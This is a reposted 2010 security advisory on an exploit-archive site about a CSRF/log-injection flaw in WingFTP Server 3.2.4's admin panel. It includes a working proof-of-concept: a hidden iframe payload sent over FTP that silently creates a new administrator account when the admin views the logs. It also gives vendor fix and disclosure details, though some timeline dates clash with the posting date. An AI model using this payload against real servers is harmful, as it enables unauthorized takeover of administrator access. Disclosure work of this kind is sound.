首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WingFTP Server v3.2.4 CSRF Vulnerability
来源:vfocus.net 作者: Ams 发布时间:2010-01-04  

 Application: WingFTP Server 3.2.4 (maybe earlier versions too)
 Link: http://www.wftpserver.com/
 Vulnerability: CSRF
 Author: Ams
 Contact: 
  mail: ax330d [at] gmail [dot] com
  site: http://www.0x416d73.name/

1. About software

 "Wing FTP server is not only a FTP server. It's a multi-protocol file server(FTP,
 HTTP, FTPS, HTTPS, SFTP) for Windows, Linux, Mac, freeBSD and Solaris. It
 includes a new set of advanced tools (web based remote control, web based
 client, administrator console, task scheduler). It provides event manager for the
 program to respond to different events, scripts support let users extend the server
 by Lua language, virtual directories for easy sharing files and directories, and more ... "

2. Vulnerability details

 Wing FTP server web based administration panel provides option to view logs. 
 We can watch logs by opening 
   [Domains -> your.domain -> Logs & Status -> Domain Log (or Activity)]
 These logs are opened directly from file to ajax'ed tag <div>. So, everything 
 that we send to ftp-server appears on the screen of browser. Without any 
 filtering. That's why we are capable of exploiting this bug.

3. Proof of concept

  Actually, via this CRSF we can do all things administrator can do from his
  control panel. The following exploit creates new administrator.

 To show the work of exploit you have to do the following:
   1. Connect to remote ftp server
   2. Send this string:
     <iframe src='http://127.0.0.1:5466/admin_addadmin.html?admin={"username":"Ams","password":"pwnpwnpwn","oldpassword":"","readonly":0,"ipmasks":[]}' width='0' height='0' border='0'></iframe>
   3. When administrator logins and opens log new administrator is created
   4. Login as admin 'Ams' and password 'pwnpwnpwn' (if you have not changed them)

4. Vendor response

 Wing FTP Server team has fixed bugs and released new version - Wing FTP Server 3.2.8.

5. Disclosure timeline

 25/12/2009 - Vendor informed
 26/12/2009 - Received response
 30/12/2010 - Bug fixed by vendor
 31/12/2010 - Public release of advisory


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·0day Joomla Core <= 1.5.x com_
·Joomla Component com_rd_downlo
·gallery_show.asp GID suffer fr
·
·Joomla Component com_artistave
·K-Rate SQL Injection Vulnerabi
·Joomla Component com_airmonobl
·0day Wordpress DOS <= 2.9
·Aptgp.v1.3.0c Cross Site Scrip
·0day Drupal DOS <= 6.16 and 5.
·linux/x86 fork bomb 6 bytes
·DJ Studio Pro 5.1.6.5.2 SEH Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved